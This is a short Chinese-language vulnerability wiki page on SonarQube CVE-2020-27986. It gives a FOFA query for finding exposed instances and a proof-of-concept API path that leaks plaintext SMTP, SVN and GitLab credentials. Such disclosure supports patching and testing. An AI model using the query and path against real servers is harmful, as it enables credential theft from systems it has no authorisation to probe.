SonarQube api 信息泄露漏洞 CVE-2020-27986

漏洞描述

SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息

漏洞影响

[!NOTE]

SonarQube

FOFA

[!NOTE]

app="sonarQube-代码管理"

漏洞复现

主页如下

image-20210627221618861

漏洞POC

http://xxx.xxx.xxx.xxx/api/settings/values

image-20210627221628431

可泄露的为:明文SMTP、SVN和Gitlab等敏感信息

image-20210627221640310

Goby & POC

[!NOTE]

SonarQube api Information leakage

image-20210627221650998

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-06-27 22:19:47

results matching ""

    No results matching ""